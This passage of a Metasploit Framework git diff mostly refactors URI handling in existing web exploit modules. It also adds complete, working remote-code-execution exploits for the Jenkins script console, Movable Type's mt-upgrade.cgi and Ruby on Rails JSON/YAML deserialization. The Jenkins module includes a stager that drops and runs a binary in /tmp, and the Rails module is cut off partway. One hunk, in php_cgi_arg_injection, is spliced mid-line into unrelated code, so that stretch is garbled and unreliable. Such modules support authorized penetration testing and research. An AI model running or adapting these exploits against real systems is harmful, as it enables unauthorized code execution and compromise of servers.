/
@@ -90,7 +90,7 @@ def upload(base, fname, file)
# upload
res = send_request_cgi({
'method' => 'POST',
- 'uri' => "#{base}pages/restart_circulation_values_write.php",
+ 'uri' => normalize_uri(base, "pages/restart_circulation_values_write.php"),
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => data_post,
})
@@ -117,7 +117,7 @@ def exploit
print_status("#{@peer} - Retrieving file: #{fname}")
send_request_raw({
'method' => 'GET',
- 'uri' => "#{base}upload/___1/#{fname}"
+ 'uri' => normalize_uri(base, "upload/___1/#{fname}")
})
handler
diff --git a/modules/exploits/multi/http/horde_href_backdoor.rb b/modules/exploits/multi/http/horde_href_backdoor.rb
index 0c36c206c2ce..e5df62a1a8ff 100644
--- a/modules/exploits/multi/http/horde_href_backdoor.rb
+++ b/modules/exploits/multi/http/horde_href_backdoor.rb
@@ -59,14 +59,14 @@ def initialize(info = {})
def exploit
# Make sure the URI begins with a slash
- uri = normalize_uri(datastore['URI'])
+ uri = datastore['URI']
function = "passthru"
key = Rex::Text.rand_text_alpha(6)
arguments = "echo #{key}`"+payload.raw+"`#{key}"
res = send_request_cgi({
- 'uri' => uri + "/services/javascript.php",
+ 'uri' => normalize_uri(uri, "/services/javascript.php"),
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'data' => "app="+datastore['APP']+"&file=open_calendar.js",
diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
index 107cb3dd29b5..4b34db401024 100644
--- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
+++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
@@ -8,7 +8,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
+ Rank = GoodRanking
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
@@ -101,7 +101,7 @@ def exploit
# Generate an initial JSESSIONID
print_status("#{@peer} - Retrieving an initial JSESSIONID")
res = send_request_cgi(
- 'uri' => "#{@uri}servlet/Main",
+ 'uri' => normalize_uri(@uri, 'servlet/Main'),
'method' => 'POST'
)
@@ -118,7 +118,7 @@ def exploit
print_status("#{@peer} - Authenticating on HP SiteScope Configuration")
res = send_request_cgi(
{
- 'uri' => "#{@uri}j_security_check",
+ 'uri' => normalize_uri(@uri, 'j_security_check'),
'method' => 'POST',
'data' => login_data,
'ctype' => "application/x-www-form-urlencoded",
@@ -264,7 +264,7 @@ def exploit
print_status("#{@peer} - Uploading the JSP")
res = send_request_cgi(
{
- 'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
+ 'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
'method' => 'POST',
'data' => post_data.to_s,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
@@ -285,7 +285,7 @@ def exploit
print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
send_request_cgi(
{
- 'uri' => "#{@uri}#{@jsp_name}.jsp",
+ 'uri' => normalize_uri(@uri, "#{@jsp_name}.jsp"),
'method' => 'GET',
'headers' =>
{
@@ -334,7 +334,7 @@ def create_user
data << "" + "\r\n"
res = send_request_cgi({
- 'uri' => "#{@uri}services/APIPreferenceImpl",
+ 'uri' => normalize_uri(@uri, 'services/APIPreferenceImpl'),
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => data,
diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb
index d2ea9a7cc8a9..07d5eb2adaef 100644
--- a/modules/exploits/multi/http/jboss_bshdeployer.rb
+++ b/modules/exploits/multi/http/jboss_bshdeployer.rb
@@ -391,7 +391,7 @@ def auto_target
end
def query_serverinfo
- path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
+ path = normalize_uri(datastore['PATH'], '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo')
res = send_request_raw(
{
'uri' => path,
@@ -449,13 +449,13 @@ def invoke_bshscript(bsh_script, pkg)
if (datastore['VERB']== "POST")
res = send_request_cgi({
'method' => datastore['VERB'],
- 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
+ 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'data' => params
})
else
res = send_request_cgi({
'method' => datastore['VERB'],
- 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + params
+ 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{params}"
}, 30)
end
res
diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
index 8808c158ffd9..422b8f83927b 100644
--- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
+++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
@@ -277,14 +277,14 @@ def upload_file(base_name, jsp_name, content)
if (datastore['VERB'] == "POST")
res = send_request_cgi(
{
- 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
+ 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'method' => datastore['VERB'],
'data' => data
}, 5)
else
res = send_request_cgi(
{
- 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + data,
+ 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{data}",
'method' => datastore['VERB'],
}, 30)
end
@@ -308,14 +308,14 @@ def delete_file(folder, name, ext)
if (datastore['VERB'] == "POST")
res = send_request_cgi(
{
- 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
+ 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'method' => datastore['VERB'],
'data' => data
}, 5)
else
res = send_request_cgi(
{
- 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor;index.jsp?' + data,
+ 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor;index.jsp') + "?#{data}",
'method' => datastore['VERB'],
}, 30)
end
@@ -378,7 +378,7 @@ def auto_target
def query_serverinfo
- path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
+ path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo'
res = send_request_raw(
{
'uri' => path,
diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb
index db63a96cb482..7c36c1fa1624 100644
--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -176,7 +176,7 @@ def exploit
if (datastore['VERB'] == "POST")
res = send_request_cgi({
'method' => datastore['VERB'],
- 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
+ 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'vars_post' =>
{
'action' => 'invokeOpByName',
@@ -189,7 +189,7 @@ def exploit
else
res = send_request_cgi({
'method' => datastore['VERB'],
- 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
+ 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'vars_get' =>
{
'action' => 'invokeOpByName',
@@ -275,7 +275,7 @@ def exploit
print_status("Undeploying #{app_base} ...")
res = send_request_cgi({
'method' => datastore['VERB'],
- 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
+ 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'vars_post' =>
{
'action' => 'invokeOpByName',
@@ -314,7 +314,7 @@ def on_request_uri(cli, request)
def query_serverinfo
- path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
+ path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo'
res = send_request_raw(
{
'uri' => path
diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb
new file mode 100644
index 000000000000..bd825a7a004e
--- /dev/null
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -0,0 +1,185 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GoodRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStagerVBS
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Jenkins Script-Console Java Execution',
+ 'Description' => %q{
+ This module uses the Jenkins Groovy script console to execute
+ OS commands using Java.
+ },
+ 'Author' =>
+ [
+ 'Spencer McIntyre',
+ 'jamcut'
+ ],
+ 'License' => MSF_LICENSE,
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => '10',
+ },
+ 'References' =>
+ [
+ ['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console']
+ ],
+ 'Targets' =>
+ [
+ ['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win'}],
+ ['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
+ ['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
+ ],
+ 'DisclosureDate' => 'Jan 18 2013',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]),
+ OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]),
+ OptString.new('TARGETURI', [ true, 'The path to jenkins', '/jenkins/' ]),
+ ], self.class)
+ end
+
+ def check
+ uri = target_uri
+ uri.path = normalize_uri(uri.path)
+ uri.path << "/" if uri.path[-1, 1] != "/"
+ res = send_request_cgi({'uri' => "#{uri.path}login"})
+ if res and res.headers.include?('X-Jenkins')
+ return Exploit::CheckCode::Detected
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def on_new_session(client)
+ if not @to_delete.nil?
+ print_warning("Deleting #{@to_delete} payload file")
+ execute_command("rm #{@to_delete}")
+ end
+ end
+
+ def http_send_command(cmd, opts = {})
+ request_parameters = {
+ 'method' => 'POST',
+ 'uri' => normalize_uri(@uri.path, "script"),
+ 'vars_post' =>
+ {
+ 'script' => java_craft_runtime_exec(cmd),
+ 'Submit' => 'Run'
+ }
+ }
+ request_parameters['cookie'] = @cookie if @cookie != nil
+ res = send_request_cgi(request_parameters)
+ if not (res and res.code == 200)
+ fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.')
+ end
+ end
+
+ def java_craft_runtime_exec(cmd)
+ decoder = Rex::Text.rand_text_alpha(5, 8)
+ decoded_bytes = Rex::Text.rand_text_alpha(5, 8)
+ cmd_array = Rex::Text.rand_text_alpha(5, 8)
+ jcode = "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
+ jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"
+
+ jcode << "String [] #{cmd_array} = new String[3];\n"
+ if target['Platform'] == 'win'
+ jcode << "#{cmd_array}[0] = \"cmd.exe\";\n"
+ jcode << "#{cmd_array}[1] = \"/c\";\n"
+ else
+ jcode << "#{cmd_array}[0] = \"/bin/sh\";\n"
+ jcode << "#{cmd_array}[1] = \"-c\";\n"
+ end
+ jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
+ jcode << "Runtime.getRuntime().exec(#{cmd_array});\n"
+ jcode
+ end
+
+ def execute_command(cmd, opts = {})
+ vprint_status("Attempting to execute: #{cmd}")
+ http_send_command("#{cmd}")
+ end
+
+ def linux_stager
+ cmds = "echo LINE | tee FILE"
+ exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+ base64 = Rex::Text.encode_base64(exe)
+ base64.gsub!(/\=/, "\\u003d")
+ file = rand_text_alphanumeric(4+rand(4))
+
+ execute_command("touch /tmp/#{file}.b64")
+ cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
+ base64.each_line do |line|
+ line.chomp!
+ cmd = cmds
+ cmd.gsub!(/LINE/, line)
+ execute_command(cmds)
+ end
+
+ execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
+ execute_command("chmod +x /tmp/#{file}")
+ execute_command("rm /tmp/#{file}.b64")
+
+ execute_command("/tmp/#{file}")
+ @to_delete = "/tmp/#{file}"
+ end
+
+
+ def exploit
+ @uri = target_uri
+ @uri.path = normalize_uri(@uri.path)
+ @uri.path << "/" if @uri.path[-1, 1] != "/"
+ print_status('Checking access to the script console')
+ res = send_request_cgi({'uri' => "#{@uri.path}script"})
+ fail_with(Exploit::Failure::Unknown) if not res
+
+ @cookie = nil
+ if res.code != 200
+ print_status('Logging in...')
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(@uri.path, "j_acegi_security_check"),
+ 'vars_post' =>
+ {
+ 'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),
+ 'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'),
+ 'Submit' => 'log in'
+ }
+ })
+
+ if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
+ fail_with(Exploit::Failure::NoAccess, 'login failed')
+ end
+ sessionid = 'JSESSIONID' << res.headers['set-cookie'].split('JSESSIONID')[1].split('; ')[0]
+ @cookie = "#{sessionid}"
+ else
+ print_status('No authentication required, skipping login...')
+ end
+
+ case target['Platform']
+ when 'win'
+ print_status("#{rhost}:#{rport} - Sending VBS stager...")
+ execute_cmdstager({:linemax => 2049})
+ when 'unix'
+ print_status("#{rhost}:#{rport} - Sending payload...")
+ http_send_command("#{payload.encoded}")
+ when 'linux'
+ print_status("#{rhost}:#{rport} - Sending Linux stager...")
+ linux_stager
+ end
+
+ handler
+ end
+end
diff --git a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb
index 0206ac51f754..98f2f7ebda21 100644
--- a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb
+++ b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb
@@ -66,7 +66,7 @@ def check
res = send_request_raw({
'method' => 'GET',
- 'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php"
+ 'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php")
})
if res and res.code == 200
@@ -87,14 +87,14 @@ def exploit
print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)")
send_request_cgi({
'method' => 'POST',
- 'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php",
+ 'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php"),
'data' => php
})
print_status("#{peer} - Requesting data.php")
send_request_raw({
'method' => 'GET',
- 'uri' => "#{uri}admin/libraries/ajaxfilemanager/inc/data.php"
+ 'uri' => normalize_uri(uri, 'admin/libraries/ajaxfilemanager/inc/data.php')
})
handler
diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb
index fbe992bc3af9..34ea77ce51df 100644
--- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb
+++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb
@@ -64,7 +64,7 @@ def check
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
- res = send_request_raw({'uri'=>"#{base}/index.php"})
+ res = send_request_raw({'uri'=>normalize_uri(uri, "/index.php")})
if res and res.body =~ /MobileCartly/
return Exploit::CheckCode::Detected
else
@@ -93,7 +93,7 @@ def exploit
#
print_status("#{@peer} - Uploading payload")
res = send_request_cgi({
- 'uri' => "#{base}/includes/savepage.php",
+ 'uri' => normalize_uri(base, "/includes/savepage.php"),
'vars_get' => {
'savepage' => php_fname,
'pagecontent' => get_write_exec_payload(:unlink_self=>true)
@@ -109,7 +109,7 @@ def exploit
# Run payload
#
print_status("#{@peer} - Requesting '#{php_fname}'")
- send_request_cgi({ 'uri' => "#{base}/pages/#{php_fname}" })
+ send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) })
handler
end
diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb
new file mode 100644
index 000000000000..0347f055039e
--- /dev/null
+++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb
@@ -0,0 +1,122 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+
+ include Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution',
+ 'Description' => %q{
+ This module can be used to execute a payload on MoveableType (MT) that
+ exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi),
+ that is used during installation and updating of the platform.
+ The vulnerability arises due to the following properties:
+ 1. This script may be invoked remotely without requiring authentication
+ to any MT instance.
+ 2. Through a crafted POST request, it is possible to invoke particular
+ database migration functions (i.e functions that bring the existing
+ database up-to-date with an updated codebase) by name and with
+ particular parameters.
+ 3. A particular migration function, core_drop_meta_for_table, allows
+ a class parameter to be set which is used directly in a perl eval
+ statement, allowing perl code injection.
+ },
+ 'Author' =>
+ [
+ 'Kacper Nowak',
+ 'Nick Blundell',
+ 'Gary O\'Leary-Steele'
+ ],
+ 'References' =>
+ [
+ ['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate)
+ ['CVE', '2013-0209'],
+ ['URL', 'http://www.sec-1.com/blog/?p=402'],
+ ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html']
+ ],
+ 'Arch' => ARCH_CMD,
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd'
+ }
+ },
+ 'Platform' =>
+ [
+ 'win',
+ 'unix'
+ ],
+ 'Targets' =>
+ [
+ ['Movable Type 4.2x, 4.3x', {}]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Jan 07 2013",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The URI path of the Movable Type installation', '/mt'])
+ ], self.class)
+ end
+
+ def check
+ @peer = "#{rhost}:#{rport}"
+ fingerprint = rand_text_alpha(5)
+ print_status("#{@peer} - Sending check...")
+ begin
+ res = http_send_raw(fingerprint)
+ rescue Rex::ConnectionError
+ return Exploit::CheckCode::Unknown
+ end
+ if (res)
+ if (res.code == 200 and res.body =~ /Can't locate object method \\"dbi_driver\\" via package \\"#{fingerprint}\\" at/)
+ return Exploit::CheckCode::Vulnerable
+ elsif (res.code != 200)
+ return Exploit::CheckCode::Unknown
+ else
+ return Exploit::CheckCode::Safe
+ end
+ else
+ return Exploit::CheckCode::Unknown
+ end
+ end
+
+ def exploit
+ @peer = "#{rhost}:#{rport}"
+ print_status("#{@peer} - Sending payload...")
+ http_send_cmd(payload.encoded)
+ end
+
+ def http_send_raw(cmd)
+ path = normalize_uri(target_uri.path, '/mt-upgrade.cgi')
+ pay = cmd.gsub('\\', '\\\\').gsub('"', '\"')
+ send_request_cgi(
+ {
+ 'uri' => path,
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ '__mode' => 'run_actions',
+ 'installing' => '1',
+ 'steps' => %{[["core_drop_meta_for_table","class","#{pay}"]]}
+ }
+ })
+ end
+
+ def http_send_cmd(cmd)
+ pay = 'v0;use MIME::Base64;system(decode_base64(q('
+ pay << Rex::Text.encode_base64(cmd)
+ pay << ')));return 0'
+ http_send_raw(pay)
+ end
+end
diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb
index 4f4557bb8026..a7fc47a52b64 100644
--- a/modules/exploits/multi/http/openfire_auth_bypass.rb
+++ b/modules/exploits/multi/http/openfire_auth_bypass.rb
@@ -89,10 +89,10 @@ def initialize(info = {})
end
def check
- base = normalize_uri(target_uri.path)
+ base = target_uri.path
base << '/' if base[-1, 1] != '/'
- path = "#{base}login.jsp"
+ path = normalize_uri(base, "login.jsp")
res = send_request_cgi(
{
'uri' => path
@@ -183,7 +183,7 @@ def exploit
data << "\r\n--#{boundary}--"
res = send_request_cgi({
- 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin",
+ 'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?uploadplugin"),
'method' => 'POST',
'data' => data,
'headers' =>
@@ -201,7 +201,7 @@ def exploit
if datastore['REMOVE_PLUGIN']
print_status("Deleting plugin #{plugin_name} from the server")
res = send_request_cgi({
- 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
+ 'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?deleteplugin=") + plugin_name.downcase,
'headers' =>
{
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb
index 2f45fc760244..a245a3cd457f 100644
--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -96,11 +96,9 @@ def exploit
]
qs = args.join()
- uri = normalize_uri(target_uri)
+ uri = normalize_uri(target_uri.path)
uri = "#{uri}?#{qs}"
- #print_status("URI: #{target_uri}?#{qs}") # Uncomment to preview URI
-
# Has to be all on one line, so gsub out the comments and the newlines
payload_oneline = " 'GET',
- 'uri' => "#{base}mods/documents/uploads/#{f}",
+ 'uri' => normalize_uri(base, 'mods/documents/uploads/', f),
'cookie' => cookie
})
end
diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb
index 7e1bee9ef4f4..6052a86061de 100644
--- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb
+++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb
@@ -56,9 +56,7 @@ def initialize(info = {})
end
def check
- uri = normalize_uri(datastore['URI'])
- uri << '/' if uri[-1,1] != '/'
- uri << 'index.php'
+ uri = normalize_uri(datastore['URI'], 'index.php')
res = send_request_raw(
{
@@ -74,9 +72,7 @@ def check
end
def get_session
- uri normalize_uri(datastore['URI'])
- uri << '/' if uri[-1,1] != '/'
- uri << 'index.php'
+ uri = normalize_uri(datastore['URI'], 'index.php')
res = send_request_raw(
{
diff --git a/modules/exploits/multi/http/phptax_exec.rb b/modules/exploits/multi/http/phptax_exec.rb
index 3de593e6cd85..d0733a8efb1d 100644
--- a/modules/exploits/multi/http/phptax_exec.rb
+++ b/modules/exploits/multi/http/phptax_exec.rb
@@ -73,13 +73,12 @@ def check
def exploit
- uri = normalize_uri(target_uri.path)
- uri << '/' if uri[-1,1] != '/'
+ uri = target_uri.path
print_status("#{rhost}#{rport} - Sending request...")
res = send_request_cgi({
'method' => 'GET',
- 'uri' => "#{uri}drawimage.php",
+ 'uri' => normalize_uri(uri, "drawimage.php"),
'vars_get' => {
'pdf' => 'make',
'pfilez' => "xxx; #{payload.encoded}"
diff --git a/modules/exploits/multi/http/plone_popen2.rb b/modules/exploits/multi/http/plone_popen2.rb
index 10c502fc7f53..1015e29dd69b 100644
--- a/modules/exploits/multi/http/plone_popen2.rb
+++ b/modules/exploits/multi/http/plone_popen2.rb
@@ -61,9 +61,7 @@ def initialize(info={})
end
def check
- uri = normalize_uri(datastore['URI'])
- uri << '/' if uri[-1,1] != '/'
- uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
+ uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
res = send_request_raw(
{
@@ -77,9 +75,7 @@ def check
end
def exploit
- uri = normalize_uri(datastore['URI'])
- uri << '/' if uri[-1,1] != '/'
- uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
+ uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
send_request_cgi(
{
diff --git a/modules/exploits/multi/http/pmwiki_pagelist.rb b/modules/exploits/multi/http/pmwiki_pagelist.rb
index 9bbbcb39674a..15526994829a 100644
--- a/modules/exploits/multi/http/pmwiki_pagelist.rb
+++ b/modules/exploits/multi/http/pmwiki_pagelist.rb
@@ -73,8 +73,7 @@ def exploit
header = rand_text_alpha_upper(3)
header_append = rand_text_alpha_upper(4)
- uri = normalize_uri(datastore['URI'])
- uri += (datastore['URI'][-1, 1] == "/") ? 'pmwiki.php' : '/pmwiki.php'
+ uri = normalize_uri(datastore['URI'], "pmwiki.php")
res = send_request_cgi({
'method' => 'POST',
diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb
index 39df154e4fe8..47959f1b7138 100644
--- a/modules/exploits/multi/http/qdpm_upload_exec.rb
+++ b/modules/exploits/multi/http/qdpm_upload_exec.rb
@@ -65,7 +65,7 @@ def check
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
- res = send_request_raw({'uri'=>"#{base}/index.php"})
+ res = send_request_raw({'uri'=>normalize_uri(base, "/index.php")})
if res and res.body =~ /.+qdPM ([\d])\.([\d]).+\<\/div\>/m
major, minor = $1, $2
return Exploit::CheckCode::Vulnerable if (major+minor).to_i <= 70
@@ -112,7 +112,7 @@ def login(base, username, password)
# Login
res = send_request_cgi({
'method' => 'POST',
- 'uri' => "#{base}/index.php/home/login",
+ 'uri' => normalize_uri("#{base}/index.php/home/login"),
'vars_post' => {
'login[email]' => username,
'login[password]' => password,
@@ -187,7 +187,7 @@ def upload_php(base, opts)
res = send_request_cgi({
'method' => 'POST',
- 'uri' => "#{base}/index.php/home/myAccount",
+ 'uri' => normalize_uri("#{base}/index.php/home/myAccount"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie,
@@ -205,7 +205,7 @@ def exec_php(base, opts)
# When we upload a file, it will be renamed. The 'myAccount' page has that info.
res = send_request_cgi({
- 'uri' => "#{base}/index.php/home/myAccount",
+ 'uri' => normalize_uri("#{base}/index.php/home/myAccount"),
'cookie' => cookie
})
diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb
new file mode 100644
index 000000000000..6fafba24d9de
--- /dev/null
+++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb
@@ -0,0 +1,118 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution',
+ 'Description' => %q{
+ This module exploits a remote code execution vulnerability in the
+ JSON request processor of the Ruby on Rails application framework.
+ This vulnerability allows an attacker to instantiate a remote object,
+ which in turn can be used to execute any ruby code remotely in the
+ context of the application. This vulnerability is very similar to
+ CVE-2013-0156.
+
+ This module has been tested successfully on RoR 3.0.9, 3.0.19, and
+ 2.3.15.
+
+ The technique used by this module requires the target to be running a
+ fairly recent version of Ruby 1.9 (since 2011 or so). Applications
+ using Ruby 1.8 may still be exploitable using the init_with() method,
+ but this has not been demonstrated.
+
+ },
+ 'Author' =>
+ [
+ 'jjarmoc', # Initial module based on cve-2013-0156, testing help
+ 'egypt', # Module
+ 'lian', # Identified the RouteSet::NamedRouteCollection vector
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2013-0333'],
+ ],
+ 'Platform' => 'ruby',
+ 'Arch' => ARCH_RUBY,
+ 'Privileged' => false,
+ 'Targets' => [ ['Automatic', {} ] ],
+ 'DisclosureDate' => 'Jan 28 2013',
+ 'DefaultOptions' => { "PrependFork" => true },
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
+ OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ])
+ ], self.class)
+
+ end
+
+ #
+ # Create the YAML document that will be embedded into the JSON
+ #
+ def build_yaml_rails2
+
+ code = Rex::Text.encode_base64(payload.encoded)
+ yaml =
+ "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
+ "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
+ "eval(%[#{code}].unpack(%[m0])[0]);' " +
+ ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " +
+ ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
+ ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
